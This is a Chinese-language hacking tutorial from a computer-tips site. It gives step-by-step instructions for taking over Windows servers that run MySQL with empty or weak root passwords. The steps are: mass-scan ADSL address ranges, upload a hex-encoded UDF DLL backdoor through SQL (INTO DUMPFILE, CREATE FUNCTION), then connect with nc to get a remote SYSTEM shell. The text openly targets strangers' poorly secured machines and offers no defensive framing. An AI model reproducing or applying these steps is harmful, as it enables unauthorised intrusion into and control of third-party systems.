萬盛學電腦網

 萬盛學電腦網 >> 病毒防治 >> 由mysql弱口令取得windows的system權限的實戰

由mysql弱口令取得windows的system權限的實戰

今年五月mix在幻影論壇公布了一篇關於mysql入侵的文章(<
執行系統命令>>,連接地址http://www.ph4nt0m.org/bbs/showthread.php?threadid=33006),反應強烈.隨

後不久,黑客基地古典辣m做了個演示動畫,可惜其中的用到mysql.txt並沒有公布,造成很多不熟悉mysql的

人不能實戰入侵mysql.
其實通過注冊mysql 的UDF DLL中自寫的Function而執行任意命令早在去年12月已經公布了,參看文章

http://www.ph4nt0m.org/bbs/showthread.php?s=&threadid=33331而mix實現直接從mysql客戶端傳送二

進制文件進入服務端硬盤中,不得不說是一個了不起的發現!下面我來說說我的入侵實戰!

1.打開hscan1.2掃描一段ip,我推薦大家掃描adsl所在的ip段,因為這些段ip的主人安全意思差,從而

能掃到大量的mysql的root口令為空且有訪問mysql默認數據庫mysql的權限.
2.在自己的機器上裝個mysql for windows.下載地址

http://download.pchome.net/internet/server/dbserver/2506.html
3.在幻影論壇下載個my_udf.dll或者mix.dll(我比較偏好my_udf.dll,因為mix.dll會造成mysql假

死).
4.運行winhex,打開my_udf.dll,點edit菜單下面的copy all選hex values;打開記事本,點粘貼,這樣

就把十六進制的my_udf.dll復制進去了!
5.再打開另外個記事本寫入如下語句:
use mysql;
set @a=concat('',0x...)
create table Mix(data LONGBLOB);
insert into Mix values("");update Mix set data = @a;
select data from Mix into DUMPFILE 'c:my_udf.dll';
CREATE FUNCTION my_udfdoor RETURNS STRING SONAME 'c:my_udf.dll';
select my_udfdoor('');
6.把第四步中記事本上的十六進制數據復制出來替換掉第5步中第二行語句中的"...",並保存到c盤根

目錄下面,命名為mysql.txt.
7.在本地打開一個dos命令窗口,跳轉到mysql安裝目錄下面,輸入mysql -h218.1.1.1 -uroot -p123
(注意,把218.1.1.1,root,123分別替換為你的hscan掃描到的ip,username,password的值.如果password的

值為空,則可以不需要參數-p);
8.在第7步中連接成功遠程mysql服務器的話,就輸入 . c:mysql.txt並敲一下回車.如果遠程mysql

是運行在windows操作系統下的且你掃描到的mysql帳號權限足夠高的話,就會成功在遠程服務器上裝上你

的後門.
9.最後用nc來連接此服務器的3306端口,並輸入密碼fuck,按回車,如果shell沒有出來,就多敲幾次回

車.如果還是不出shell,那就換個目標試一試吧.

copyright © 萬盛學電腦網 all rights reserved